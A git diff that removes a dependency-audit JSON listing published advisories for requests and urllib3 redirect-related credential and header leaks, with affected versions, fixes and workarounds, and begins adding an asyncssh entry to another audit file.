diff --git a/audits/anime-downloader-requirements.audit.json b/audits/anime-downloader-requirements.audit.json
deleted file mode 100644
index fc3dca54..00000000
--- a/audits/anime-downloader-requirements.audit.json
+++ /dev/null
@@ -1,1103 +0,0 @@
-[
- {
- "package": {
- "name": "requests",
- "version": "2.28.1",
- "ecosystem": "PyPI",
- "commit": ""
- },
- "vulnerabilities": [
- {
- "modified": "2023-09-20T19:34:14Z",
- "published": "2023-05-22T20:36:32Z",
- "schema_version": "1.6.0",
- "id": "GHSA-j8r2-6x86-q33q",
- "aliases": [
- "CVE-2023-32681"
- ],
- "summary": "Unintended leak of Proxy-Authorization header in requests",
- "details": "### Impact\n\nSince Requests v2.3.0, Requests has been vulnerable to potentially leaking `Proxy-Authorization` headers to destination servers, specifically during redirects to an HTTPS origin. This is a product of how `rebuild_proxies` is used to recompute and [reattach the `Proxy-Authorization` header](https://github.com/psf/requests/blob/f2629e9e3c7ce3c3c8c025bcd8db551101cbc773/requests/sessions.py#L319-L328) to requests when redirected. Note this behavior has _only_ been observed to affect proxied requests when credentials are supplied in the URL user information component (e.g. `https://username:password@proxy:8080`).\n\n**Current vulnerable behavior(s):**\n\n1. HTTP \u2192 HTTPS: **leak**\n2. HTTPS \u2192 HTTP: **no leak**\n3. HTTPS \u2192 HTTPS: **leak**\n4. HTTP \u2192 HTTP: **no leak**\n\nFor HTTP connections sent through the proxy, the proxy will identify the header in the request itself and remove it prior to forwarding to the destination server. However when sent over HTTPS, the `Proxy-Authorization` header must be sent in the CONNECT request as the proxy has no visibility into further tunneled requests. This results in Requests forwarding the header to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate those credentials.\n\nThe reason this currently works for HTTPS connections in Requests is the `Proxy-Authorization` header is also handled by urllib3 with our usage of the ProxyManager in adapters.py with [`proxy_manager_for`](https://github.com/psf/requests/blob/f2629e9e3c7ce3c3c8c025bcd8db551101cbc773/requests/adapters.py#L199-L235). This will compute the required proxy headers in `proxy_headers` and pass them to the Proxy Manager, avoiding attaching them directly to the Request object. This will be our preferred option going forward for default usage.\n\n### Patches\nStarting in Requests v2.31.0, Requests will no longer attach this header to redirects with an HTTPS destination. This should have no negative impacts on the default behavior of the library as the proxy credentials are already properly being handled by urllib3's ProxyManager.\n\nFor users with custom adapters, this _may_ be potentially breaking if you were already working around this behavior. The previous functionality of `rebuild_proxies` doesn't make sense in any case, so we would encourage any users impacted to migrate any handling of Proxy-Authorization directly into their custom adapter.\n\n### Workarounds\nFor users who are not able to update Requests immediately, there is one potential workaround.\n\nYou may disable redirects by setting `allow_redirects` to `False` on all calls through Requests top-level APIs. Note that if you're currently relying on redirect behaviors, you will need to capture the 3xx response codes and ensure a new request is made to the redirect destination.\n```\nimport requests\nr = requests.get('http://github.com/', allow_redirects=False)\n```\n\n### Credits\n\nThis vulnerability was discovered and disclosed by the following individuals.\n\nDennis Brinkrolf, Haxolot (https://haxolot.com/)\nTobias Funke, (tobiasfunke93@gmail.com)",
- "affected": [
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "requests",
- "purl": "pkg:pypi/requests"
- },
- "ranges": [
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "2.3.0"
- },
- {
- "fixed": "2.31.0"
- }
- ]
- }
- ],
- "versions": [
- "2.10.0",
- "2.11.0",
- "2.11.1",
- "2.12.0",
- "2.12.1",
- "2.12.2",
- "2.12.3",
- "2.12.4",
- "2.12.5",
- "2.13.0",
- "2.14.0",
- "2.14.1",
- "2.14.2",
- "2.15.0",
- "2.15.1",
- "2.16.0",
- "2.16.1",
- "2.16.2",
- "2.16.3",
- "2.16.4",
- "2.16.5",
- "2.17.0",
- "2.17.1",
- "2.17.2",
- "2.17.3",
- "2.18.0",
- "2.18.1",
- "2.18.2",
- "2.18.3",
- "2.18.4",
- "2.19.0",
- "2.19.1",
- "2.20.0",
- "2.20.1",
- "2.21.0",
- "2.22.0",
- "2.23.0",
- "2.24.0",
- "2.25.0",
- "2.25.1",
- "2.26.0",
- "2.27.0",
- "2.27.1",
- "2.28.0",
- "2.28.1",
- "2.28.2",
- "2.29.0",
- "2.3.0",
- "2.30.0",
- "2.4.0",
- "2.4.1",
- "2.4.2",
- "2.4.3",
- "2.5.0",
- "2.5.1",
- "2.5.2",
- "2.5.3",
- "2.6.0",
- "2.6.1",
- "2.6.2",
- "2.7.0",
- "2.8.0",
- "2.8.1",
- "2.9.0",
- "2.9.1",
- "2.9.2"
- ],
- "database_specific": {
- "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/05/GHSA-j8r2-6x86-q33q/GHSA-j8r2-6x86-q33q.json"
- },
- "ecosystem_specific": {
- "affected_functions": [
- "requests.sessions.SessionRedirectMixin.rebuild_proxies"
- ]
- }
- }
- ],
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N"
- }
- ],
- "references": [
- {
- "type": "WEB",
- "url": "https://github.com/psf/requests/security/advisories/GHSA-j8r2-6x86-q33q"
- },
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32681"
- },
- {
- "type": "WEB",
- "url": "https://github.com/psf/requests/commit/74ea7cf7a6a27a4eeb2ae24e162bcc942a6706d5"
- },
- {
- "type": "PACKAGE",
- "url": "https://github.com/psf/requests"
- },
- {
- "type": "WEB",
- "url": "https://github.com/psf/requests/releases/tag/v2.31.0"
- },
- {
- "type": "WEB",
- "url": "https://github.com/pypa/advisory-database/tree/main/vulns/requests/PYSEC-2023-74.yaml"
- },
- {
- "type": "WEB",
- "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00018.html"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AW7HNFGYP44RT3DUDQXG2QT3OEV2PJ7Y/"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KOYASTZDGQG2BWLSNBPL3TQRL2G7QYNZ/"
- },
- {
- "type": "WEB",
- "url": "https://security.gentoo.org/glsa/202309-08"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-200"
- ],
- "github_reviewed": true,
- "github_reviewed_at": "2023-05-22T20:36:32Z",
- "nvd_published_at": null,
- "severity": "MODERATE"
- }
- },
- {
- "modified": "2023-06-05T01:13:00Z",
- "published": "2023-05-26T18:15:00Z",
- "schema_version": "1.6.0",
- "id": "PYSEC-2023-74",
- "aliases": [
- "CVE-2023-32681",
- "GHSA-j8r2-6x86-q33q"
- ],
- "details": "Requests is a HTTP library. Since Requests 2.3.0, Requests has been leaking Proxy-Authorization headers to destination servers when redirected to an HTTPS endpoint. This is a product of how we use `rebuild_proxies` to reattach the `Proxy-Authorization` header to requests. For HTTP connections sent through the tunnel, the proxy will identify the header in the request itself and remove it prior to forwarding to the destination server. However when sent over HTTPS, the `Proxy-Authorization` header must be sent in the CONNECT request as the proxy has no visibility into the tunneled request. This results in Requests forwarding proxy credentials to the destination server unintentionally, allowing a malicious actor to potentially exfiltrate sensitive information. This issue has been patched in version 2.31.0.\n\n",
- "affected": [
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "requests",
- "purl": "pkg:pypi/requests"
- },
- "ranges": [
- {
- "type": "GIT",
- "events": [
- {
- "introduced": "0"
- },
- {
- "fixed": "74ea7cf7a6a27a4eeb2ae24e162bcc942a6706d5"
- }
- ],
- "repo": "https://github.com/psf/requests"
- },
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "2.3.0"
- },
- {
- "fixed": "2.31.0"
- }
- ]
- }
- ],
- "versions": [
- "2.10.0",
- "2.11.0",
- "2.11.1",
- "2.12.0",
- "2.12.1",
- "2.12.2",
- "2.12.3",
- "2.12.4",
- "2.12.5",
- "2.13.0",
- "2.14.0",
- "2.14.1",
- "2.14.2",
- "2.15.0",
- "2.15.1",
- "2.16.0",
- "2.16.1",
- "2.16.2",
- "2.16.3",
- "2.16.4",
- "2.16.5",
- "2.17.0",
- "2.17.1",
- "2.17.2",
- "2.17.3",
- "2.18.0",
- "2.18.1",
- "2.18.2",
- "2.18.3",
- "2.18.4",
- "2.19.0",
- "2.19.1",
- "2.20.0",
- "2.20.1",
- "2.21.0",
- "2.22.0",
- "2.23.0",
- "2.24.0",
- "2.25.0",
- "2.25.1",
- "2.26.0",
- "2.27.0",
- "2.27.1",
- "2.28.0",
- "2.28.1",
- "2.28.2",
- "2.29.0",
- "2.3.0",
- "2.30.0",
- "2.4.0",
- "2.4.1",
- "2.4.2",
- "2.4.3",
- "2.5.0",
- "2.5.1",
- "2.5.2",
- "2.5.3",
- "2.6.0",
- "2.6.1",
- "2.6.2",
- "2.7.0",
- "2.8.0",
- "2.8.1",
- "2.9.0",
- "2.9.1",
- "2.9.2"
- ],
- "database_specific": {
- "source": "https://github.com/pypa/advisory-database/blob/main/vulns/requests/PYSEC-2023-74.yaml"
- }
- }
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://github.com/psf/requests/security/advisories/GHSA-j8r2-6x86-q33q"
- },
- {
- "type": "WEB",
- "url": "https://github.com/psf/requests/releases/tag/v2.31.0"
- },
- {
- "type": "FIX",
- "url": "https://github.com/psf/requests/commit/74ea7cf7a6a27a4eeb2ae24e162bcc942a6706d5"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AW7HNFGYP44RT3DUDQXG2QT3OEV2PJ7Y/"
- }
- ]
- }
- ],
- "groups": [
- {
- "ids": [
- "GHSA-j8r2-6x86-q33q",
- "PYSEC-2023-74"
- ]
- }
- ]
- },
- {
- "package": {
- "name": "urllib3",
- "version": "1.26.13",
- "ecosystem": "PyPI",
- "commit": ""
- },
- "vulnerabilities": [
- {
- "modified": "2023-11-06T16:43:34Z",
- "published": "2023-10-17T20:15:25Z",
- "schema_version": "1.6.0",
- "id": "GHSA-g4mx-q9vg-27p4",
- "aliases": [
- "CVE-2023-45803"
- ],
- "summary": "urllib3's request body not stripped after redirect from 303 status changes request method to GET",
- "details": "urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 303 \"See Other\" after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although the behavior of removing the request body is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers.\n\nFrom [RFC 9110 Section 9.3.1](https://www.rfc-editor.org/rfc/rfc9110.html#name-get):\n\n> A client SHOULD NOT generate content in a GET request unless it is made directly to an origin server that has previously indicated, in or out of band, that such a request has a purpose and will be adequately supported.\n\n## Affected usages\n\nBecause the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable.\n\nBoth of the following conditions must be true to be affected by this vulnerability:\n\n* If you're using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON)\n* The origin service is compromised and starts redirecting using 303 to a malicious peer or the redirected-to service becomes compromised.\n\n## Remediation\n\nYou can remediate this vulnerability with any of the following steps:\n\n* Upgrade to a patched version of urllib3 (v1.26.18 or v2.0.7)\n* Disable redirects for services that you aren't expecting to respond with redirects with `redirects=False`.\n* Disable automatic redirects with `redirects=False` and handle 303 redirects manually by stripping the HTTP request body.\n",
- "affected": [
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "2.0.0"
- },
- {
- "fixed": "2.0.7"
- }
- ]
- }
- ],
- "versions": [
- "2.0.0",
- "2.0.1",
- "2.0.2",
- "2.0.3",
- "2.0.4",
- "2.0.5",
- "2.0.6"
- ],
- "database_specific": {
- "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g4mx-q9vg-27p4/GHSA-g4mx-q9vg-27p4.json"
- }
- },
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "0"
- },
- {
- "fixed": "1.26.18"
- }
- ]
- }
- ],
- "versions": [
- "0.2",
- "0.3",
- "0.3.1",
- "0.4.0",
- "0.4.1",
- "1.0",
- "1.0.1",
- "1.0.2",
- "1.1",
- "1.10",
- "1.10.1",
- "1.10.2",
- "1.10.3",
- "1.10.4",
- "1.11",
- "1.12",
- "1.13",
- "1.13.1",
- "1.14",
- "1.15",
- "1.15.1",
- "1.16",
- "1.17",
- "1.18",
- "1.18.1",
- "1.19",
- "1.19.1",
- "1.2",
- "1.2.1",
- "1.2.2",
- "1.20",
- "1.21",
- "1.21.1",
- "1.22",
- "1.23",
- "1.24",
- "1.24.1",
- "1.24.2",
- "1.24.3",
- "1.25",
- "1.25.1",
- "1.25.10",
- "1.25.11",
- "1.25.2",
- "1.25.3",
- "1.25.4",
- "1.25.5",
- "1.25.6",
- "1.25.7",
- "1.25.8",
- "1.25.9",
- "1.26.0",
- "1.26.1",
- "1.26.10",
- "1.26.11",
- "1.26.12",
- "1.26.13",
- "1.26.14",
- "1.26.15",
- "1.26.16",
- "1.26.17",
- "1.26.2",
- "1.26.3",
- "1.26.4",
- "1.26.5",
- "1.26.6",
- "1.26.7",
- "1.26.8",
- "1.26.9",
- "1.3",
- "1.4",
- "1.5",
- "1.6",
- "1.7",
- "1.7.1",
- "1.8",
- "1.8.2",
- "1.8.3",
- "1.9",
- "1.9.1"
- ],
- "database_specific": {
- "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g4mx-q9vg-27p4/GHSA-g4mx-q9vg-27p4.json"
- }
- }
- ],
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "references": [
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"
- },
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/commit/4e50fbc5db74e32cabd5ccc1ab81fc103adfe0b3"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/commit/b594c5ceaca38e1ac215f916538fb128e3526a36"
- },
- {
- "type": "WEB",
- "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"
- },
- {
- "type": "PACKAGE",
- "url": "https://github.com/urllib3/urllib3"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/releases/tag/1.26.18"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/releases/tag/2.0.7"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB/"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5/"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX/"
- },
- {
- "type": "WEB",
- "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-200"
- ],
- "github_reviewed": true,
- "github_reviewed_at": "2023-10-17T20:15:25Z",
- "nvd_published_at": "2023-10-17T20:15:10Z",
- "severity": "MODERATE"
- }
- },
- {
- "modified": "2023-11-04T00:48:52Z",
- "published": "2023-10-02T23:27:05Z",
- "schema_version": "1.6.0",
- "id": "GHSA-v845-jxx5-vc9f",
- "aliases": [
- "CVE-2023-43804"
- ],
- "summary": "`Cookie` HTTP header isn't stripped on cross-origin redirects",
- "details": "urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly.\n\nUsers **must** handle redirects themselves instead of relying on urllib3's automatic redirects to achieve safe processing of the `Cookie` header, thus we decided to strip the header by default in order to further protect users who aren't using the correct approach.\n\n## Affected usages\n\nWe believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:\n\n* Using an affected version of urllib3 (patched in v1.26.17 and v2.0.6)\n* Using the `Cookie` header on requests, which is mostly typical for impersonating a browser.\n* Not disabling HTTP redirects\n* Either not using HTTPS or for the origin server to redirect to a malicious origin.\n\n## Remediation\n\n* Upgrading to at least urllib3 v1.26.17 or v2.0.6\n* Disabling HTTP redirects using `redirects=False` when sending requests.\n* Not using the `Cookie` header.",
- "affected": [
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "2.0.0"
- },
- {
- "fixed": "2.0.6"
- }
- ]
- }
- ],
- "versions": [
- "2.0.0",
- "2.0.1",
- "2.0.2",
- "2.0.3",
- "2.0.4",
- "2.0.5"
- ],
- "database_specific": {
- "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-v845-jxx5-vc9f/GHSA-v845-jxx5-vc9f.json"
- }
- },
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "0"
- },
- {
- "fixed": "1.26.17"
- }
- ]
- }
- ],
- "versions": [
- "0.2",
- "0.3",
- "0.3.1",
- "0.4.0",
- "0.4.1",
- "1.0",
- "1.0.1",
- "1.0.2",
- "1.1",
- "1.10",
- "1.10.1",
- "1.10.2",
- "1.10.3",
- "1.10.4",
- "1.11",
- "1.12",
- "1.13",
- "1.13.1",
- "1.14",
- "1.15",
- "1.15.1",
- "1.16",
- "1.17",
- "1.18",
- "1.18.1",
- "1.19",
- "1.19.1",
- "1.2",
- "1.2.1",
- "1.2.2",
- "1.20",
- "1.21",
- "1.21.1",
- "1.22",
- "1.23",
- "1.24",
- "1.24.1",
- "1.24.2",
- "1.24.3",
- "1.25",
- "1.25.1",
- "1.25.10",
- "1.25.11",
- "1.25.2",
- "1.25.3",
- "1.25.4",
- "1.25.5",
- "1.25.6",
- "1.25.7",
- "1.25.8",
- "1.25.9",
- "1.26.0",
- "1.26.1",
- "1.26.10",
- "1.26.11",
- "1.26.12",
- "1.26.13",
- "1.26.14",
- "1.26.15",
- "1.26.16",
- "1.26.2",
- "1.26.3",
- "1.26.4",
- "1.26.5",
- "1.26.6",
- "1.26.7",
- "1.26.8",
- "1.26.9",
- "1.3",
- "1.4",
- "1.5",
- "1.6",
- "1.7",
- "1.7.1",
- "1.8",
- "1.8.2",
- "1.8.3",
- "1.9",
- "1.9.1"
- ],
- "database_specific": {
- "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-v845-jxx5-vc9f/GHSA-v845-jxx5-vc9f.json"
- }
- }
- ],
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N"
- }
- ],
- "references": [
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"
- },
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/commit/01220354d389cd05474713f8c982d05c9b17aafb"
- },
- {
- "type": "WEB",
- "url": "https://github.com/urllib3/urllib3/commit/644124ecd0b6e417c527191f866daa05a5a2056d"
- },
- {
- "type": "WEB",
- "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"
- },
- {
- "type": "PACKAGE",
- "url": "https://github.com/urllib3/urllib3"
- },
- {
- "type": "WEB",
- "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5/"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY/"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-200"
- ],
- "github_reviewed": true,
- "github_reviewed_at": "2023-10-02T23:27:05Z",
- "nvd_published_at": "2023-10-04T17:15:10Z",
- "severity": "MODERATE"
- }
- },
- {
- "modified": "2023-10-10T14:28:19Z",
- "published": "2023-10-04T17:15:00Z",
- "schema_version": "1.6.0",
- "id": "PYSEC-2023-192",
- "aliases": [
- "CVE-2023-43804",
- "GHSA-v845-jxx5-vc9f"
- ],
- "details": "urllib3 is a user-friendly HTTP client library for Python. urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly. This issue has been patched in urllib3 version 1.26.17 or 2.0.5.",
- "affected": [
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "GIT",
- "events": [
- {
- "introduced": "0"
- },
- {
- "fixed": "644124ecd0b6e417c527191f866daa05a5a2056d"
- },
- {
- "fixed": "01220354d389cd05474713f8c982d05c9b17aafb"
- }
- ],
- "repo": "https://github.com/urllib3/urllib3"
- },
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "2.0.0"
- },
- {
- "fixed": "2.0.6"
- },
- {
- "introduced": "0"
- },
- {
- "fixed": "1.26.17"
- }
- ]
- }
- ],
- "versions": [
- "0.2",
- "0.3",
- "0.3.1",
- "0.4.0",
- "0.4.1",
- "1.0",
- "1.0.1",
- "1.0.2",
- "1.1",
- "1.10",
- "1.10.1",
- "1.10.2",
- "1.10.3",
- "1.10.4",
- "1.11",
- "1.12",
- "1.13",
- "1.13.1",
- "1.14",
- "1.15",
- "1.15.1",
- "1.16",
- "1.17",
- "1.18",
- "1.18.1",
- "1.19",
- "1.19.1",
- "1.2",
- "1.2.1",
- "1.2.2",
- "1.20",
- "1.21",
- "1.21.1",
- "1.22",
- "1.23",
- "1.24",
- "1.24.1",
- "1.24.2",
- "1.24.3",
- "1.25",
- "1.25.1",
- "1.25.10",
- "1.25.11",
- "1.25.2",
- "1.25.3",
- "1.25.4",
- "1.25.5",
- "1.25.6",
- "1.25.7",
- "1.25.8",
- "1.25.9",
- "1.26.0",
- "1.26.1",
- "1.26.10",
- "1.26.11",
- "1.26.12",
- "1.26.13",
- "1.26.14",
- "1.26.15",
- "1.26.16",
- "1.26.2",
- "1.26.3",
- "1.26.4",
- "1.26.5",
- "1.26.6",
- "1.26.7",
- "1.26.8",
- "1.26.9",
- "1.3",
- "1.4",
- "1.5",
- "1.6",
- "1.7",
- "1.7.1",
- "1.8",
- "1.8.2",
- "1.8.3",
- "1.9",
- "1.9.1",
- "2.0.0",
- "2.0.1",
- "2.0.2",
- "2.0.3",
- "2.0.4",
- "2.0.5"
- ],
- "database_specific": {
- "source": "https://github.com/pypa/advisory-database/blob/main/vulns/urllib3/PYSEC-2023-192.yaml"
- }
- }
- ],
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
- }
- ],
- "references": [
- {
- "type": "FIX",
- "url": "https://github.com/urllib3/urllib3/commit/644124ecd0b6e417c527191f866daa05a5a2056d"
- },
- {
- "type": "ADVISORY",
- "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"
- },
- {
- "type": "FIX",
- "url": "https://github.com/urllib3/urllib3/commit/01220354d389cd05474713f8c982d05c9b17aafb"
- },
- {
- "type": "WEB",
- "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"
- }
- ]
- },
- {
- "modified": "2023-10-25T18:28:34Z",
- "published": "2023-10-17T20:15:00Z",
- "schema_version": "1.6.0",
- "id": "PYSEC-2023-212",
- "aliases": [
- "CVE-2023-45803",
- "GHSA-g4mx-q9vg-27p4"
- ],
- "details": "urllib3 is a user-friendly HTTP client library for Python. urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 301, 302, or 303 after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although this behavior is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: 1. Using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) and 2. The origin service is compromised and starts redirecting using 301, 302, or 303 to a malicious peer or the redirected-to service becomes compromised. This issue has been addressed in versions 1.26.18 and 2.0.7 and users are advised to update to resolve this issue. Users unable to update should disable redirects for services that aren't expecting to respond with redirects with `redirects=False` and disable automatic redirects with `redirects=False` and handle 301, 302, and 303 redirects manually by stripping the HTTP request body.\n",
- "affected": [
- {
- "package": {
- "ecosystem": "PyPI",
- "name": "urllib3",
- "purl": "pkg:pypi/urllib3"
- },
- "ranges": [
- {
- "type": "GIT",
- "events": [
- {
- "introduced": "0"
- },
- {
- "fixed": "4e98d57809dacab1cbe625fddeec1a290c478ea9"
- }
- ],
- "repo": "https://github.com/urllib3/urllib3"
- },
- {
- "type": "ECOSYSTEM",
- "events": [
- {
- "introduced": "2.0.0"
- },
- {
- "fixed": "2.0.7"
- },
- {
- "introduced": "0"
- },
- {
- "fixed": "1.26.18"
- }
- ]
- }
- ],
- "versions": [
- "0.2",
- "0.3",
- "0.3.1",
- "0.4.0",
- "0.4.1",
- "1.0",
- "1.0.1",
- "1.0.2",
- "1.1",
- "1.10",
- "1.10.1",
- "1.10.2",
- "1.10.3",
- "1.10.4",
- "1.11",
- "1.12",
- "1.13",
- "1.13.1",
- "1.14",
- "1.15",
- "1.15.1",
- "1.16",
- "1.17",
- "1.18",
- "1.18.1",
- "1.19",
- "1.19.1",
- "1.2",
- "1.2.1",
- "1.2.2",
- "1.20",
- "1.21",
- "1.21.1",
- "1.22",
- "1.23",
- "1.24",
- "1.24.1",
- "1.24.2",
- "1.24.3",
- "1.25",
- "1.25.1",
- "1.25.10",
- "1.25.11",
- "1.25.2",
- "1.25.3",
- "1.25.4",
- "1.25.5",
- "1.25.6",
- "1.25.7",
- "1.25.8",
- "1.25.9",
- "1.26.0",
- "1.26.1",
- "1.26.10",
- "1.26.11",
- "1.26.12",
- "1.26.13",
- "1.26.14",
- "1.26.15",
- "1.26.16",
- "1.26.17",
- "1.26.2",
- "1.26.3",
- "1.26.4",
- "1.26.5",
- "1.26.6",
- "1.26.7",
- "1.26.8",
- "1.26.9",
- "1.3",
- "1.4",
- "1.5",
- "1.6",
- "1.7",
- "1.7.1",
- "1.8",
- "1.8.2",
- "1.8.3",
- "1.9",
- "1.9.1",
- "2.0.0",
- "2.0.1",
- "2.0.2",
- "2.0.3",
- "2.0.4",
- "2.0.5",
- "2.0.6"
- ],
- "database_specific": {
- "source": "https://github.com/pypa/advisory-database/blob/main/vulns/urllib3/PYSEC-2023-212.yaml"
- }
- }
- ],
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"
- },
- {
- "type": "WEB",
- "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"
- },
- {
- "type": "FIX",
- "url": "https://github.com/urllib3/urllib3/commit/4e98d57809dacab1cbe625fddeec1a290c478ea9"
- },
- {
- "type": "ARTICLE",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX/"
- }
- ]
- }
- ],
- "groups": [
- {
- "ids": [
- "GHSA-g4mx-q9vg-27p4",
- "PYSEC-2023-212"
- ]
- },
- {
- "ids": [
- "GHSA-v845-jxx5-vc9f",
- "PYSEC-2023-192"
- ]
- }
- ]
- }
-]
\ No newline at end of file
diff --git a/audits/dvc-requirements.audit.json b/audits/dvc-requirements.audit.json
index 43303ad0..c8f492ea 100644
--- a/audits/dvc-requirements.audit.json
+++ b/audits/dvc-requirements.audit.json
@@ -1,4 +1,321 @@
[
+ {
+ "package": {
+ "name": "asyncssh",
+ "version": "2.14.0",
+ "ecosystem": "PyPI",
+ "commit": ""
+ },
+ "vulnerabilities": [
+ {
